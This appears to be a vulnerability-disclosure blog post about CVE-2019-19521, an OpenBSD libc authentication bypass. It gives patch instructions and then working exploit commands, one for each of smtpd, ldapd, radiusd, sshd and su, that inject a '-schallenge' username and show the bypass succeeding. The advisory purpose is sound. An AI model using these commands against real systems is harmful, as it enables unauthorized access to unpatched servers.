New authentication bypass vulnerability found in OpenBSD

Affecting:

opensmtpd



ldapd



radiusd



sshd



su

on OpenBSD.



Sometimes Zero days in widely used software is the simpliest thing.

Summary:

An remote authentication vulnerability has been found in

the latest version of OpenBSD which is 6.6,

Due to an insufficient username validation in libc

a remote third party can exploit the login libc function.

Patch it

The OpenBSD developer Reyk Flöte was quick on tweeting out

about this vulnerability.



If you are running OpenBSD

it means its time to run syspatch

# syspatch Get/Verify syspatch65-011_expat.tgz 100% |*********| 588 KB 00:02 Installing patch 011_expat Get/Verify syspatch65-012_sysupgr... 100% |********| 11482 00:00 Installing patch 012_sysupgrade Relinking to create unique kernel... done; reboot to load the new kernel Errata can be reviewed under /var/syspatch

A patch has been written and published in the latest patch 010_libcauth.patch.

Exploiting the authentication bypass

A report of the vulnerability has been published

on the Bugtraq mailing lists.

The vulnerability can easily be exploited by providing a

username with the flag “-schallenge”

(or “-schallenge:passwd” to force a passwd-style authentication).

The report describes the vulnerability and the affecting parts:

smtpd

/etc/mail/smtpd.conf if authentication is done with just appending “auth” in a rule set

then your system is vulnerable.

The authentication is exploitable:

$ printf '\0-schallenge\0whatever' | openssl base64 AC1zY2hhbGxlbmdlAHdoYXRldmVy $ openssl s_client -connect 192.168.56.121:25 -starttls smtp ... EHLO client.example.com ... AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy 235 2.0.0 Authentication succeeded

ldapd

$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whatever SASL/PLAIN authentication started ldap_sasl_interactive_bind_s: Invalid credentials (49) $ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whatever SASL/PLAIN authentication started SASL username: -schallenge ... # numResponses: 1

radiusd

if bsdauth is enabled in /etc/radiusd.conf:

$ radiusctl test 192.168.56.121 secret -schallenge password whatever ... Reply-Message = "Authentication succeeded"

sshd

$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \ -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121 ... debug1: Next authentication method: keyboard-interactive

su

$ su -L -- -schallenge Segmentation fault

External links:

OpenBSD 6.6 errata

CVE-2019-19521

Bugtraq announcement

libc wikipedia

OpenBSD libc patch

Stay up to date with Vulnerability Management and build cool things with our API

This blog post is part of the exploit of the day series

where we write a shorter description about interesting

exploits that we index.